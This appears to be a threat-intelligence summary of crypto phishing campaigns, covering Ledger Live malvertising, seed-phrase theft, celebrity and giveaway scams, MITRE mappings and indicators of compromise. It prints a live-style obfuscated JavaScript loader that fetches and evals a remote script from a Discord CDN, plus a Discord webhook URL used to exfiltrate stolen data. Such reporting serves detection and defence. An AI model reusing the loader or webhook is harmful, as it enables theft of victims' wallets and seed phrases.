Threat Research

A Whirlwind Tour Of Crypto Phishing

Securonix

The article surveys how crypto phishing relies on malvertising, social media campaigns, and fake wallet prompts to steal seed phrases, wallets, and NFTs—from Ledger impersonations to Vitalik Buterin fakery and ApeCoin scams. It also highlights techniques like cloaked Ledger Live pages, Discord webhooks for C2, and giveaway scams, and provides concrete IOCs and examples.
#Ledger #VitalikButerin #ApeCoin #ukrainethereum #GangsterAllStar #Discord

Keypoints

  • Malvertising campaigns drive users to cloaked phishing pages masquerading as Ledger Live, with the aim of harvesting seed phrases.
  • Phishing chains often prompt users to connect wallets and enter seed phrases, enabling theft of crypto and NFTs via fake wallets or approvals.
  • Public social-media lures (e.g., Vitalik Buterin impersonations and giveaway scams) are used to funnel victims to malicious sites and token grabs.
  • Phishing campaigns combine low-tech web pages with clever branding and timing to maximize impact, including brand impersonation and hype around new tokens (e.g., Ape Coin).
  • Multiple brands are targeted (Ledger, Coinbase, Axie Infinity), with Axie Infinity identified as a hot target in recent weeks.
  • Attackers use a mix of malvertising, fake ads, and Discord-based C2 infrastructure to exfiltrate data and coordinate theft campaigns.
  • Examples show threats extending from ad networks to domain registrations and open-source indicators (including VirusTotal/OTX references) to track and analyze campaigns.

MITRE Techniques

  • [T1189] Drive-by Compromise – Malvertising drives users to phishing content; “search ads that target Ledger keywords” and campaigns that push toward theft.
  • [T1566.002] Phishing: Spearphishing Link – Cloaked phishing pages masquerade as Ledger Live and prompt users to enter seed phrases; “These ads link to cloaked phishing pages that masquerade as Ledger Live and try to get victims to enter their seed phrase.”
  • [T1059.007] JavaScript – Malicious JavaScript used in-page to fetch and execute payloads; “javascript:fetch(/*xmarksthespot.*/atob(/*Whitelist.*/’aHR0cHM6Ly9jZG4uZGlzY29yZGFwcC5jb20vYXR0YWNobWVudHMvOTM1MTA4MzQ4MzYwMTM0NjY2Lzk1MTkxMDEzMDY5NjQ3ODg4MC94Lmpz’)).then(leaving => leaving.text()).then(successfully => eval(successfully))”
  • [T1071.001] Web Protocols – Use of Discord webhooks and web-based C2 channels; “https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF” to exfiltrate data.
  • [T1041] Exfiltration Over C2 Channel – Data (seed phrases, balance/NFT info) posted back to C2; “post those back home to the C2.”
  • [T1567.002] Exfiltration to Web Service – Use of web-based endpoints (Discord webhook) to transfer stolen data.
  • [T1027] Obfuscated/Encoded Files and Information – Inline obfuscated payloads and dynamic code loading (atob and eval usage) to conceal actions.
  • [T1119] Automated Collection – The malware scans the victim’s drive for .txt files containing keywords like ‘key’, ‘wallet’, and ‘seed’ and posts them to C2; “scans the Victim’s drive for .txt files that contain the keywords ‘key’, ‘wallet’, and ‘seed’ …”

Indicators of Compromise

  • [Domain] ukrainethereum.com – phishing domain used in deceptive Ukraine-related crypto campaigns
  • [Domain] ape-coin.net – domain associated with ApeCoin-themed phishing content
  • [Domain] register.gangsterallstar.com – deceptive site mimicking Gangster All Star NFT project
  • [Domain] discord.com – used as part of webhook/C2 infrastructure
  • [Domain] cdn.discordapp.com – media hosting domain referenced in Discord-related activity
  • [URL] https://discord.com/api/webhooks/951908349677568091/4N7ccrI6NWBsD-Gw7BIs3MTyYm037ixS1iJvzwiQESe1z_gE6Se6j5JPMmQArspuJ4dF – webhook used for data exfiltration
  • [IP] 185.215.113.15 – IP referenced in AlienVault indicator
  • [Hash] 0xed4f4f461de76264299429909cfb102283b47310 – cryptic hash/address found in VT/OTX context
  • [URL] https://www.virustotal.com/gui/file/581b56dea8f59f59e14d10c1d417e94d6432901494fd9fa315a7fe53c0f13f26/details – VirusTotal indicator
  • [URL] https://otx.alienvault.com/indicator/ip/185.215.113.15 – AlienVault indicator page
  • [URL] https://www.tomsguide.com/news/discord-spidey-bot-malware-is-stealing-usernames-passwords – external report referenced
  • [File name] Exact_sizes_to_order_from_the_artist.rar – malware payload artifact described in the article
  • [File name] Exact sizes to order from the artist_document.pdf.pif – disguised payload

Read more: https://blog.confiant.com/a-whirlwind-tour-of-crypto-phishing-8628da0a9e38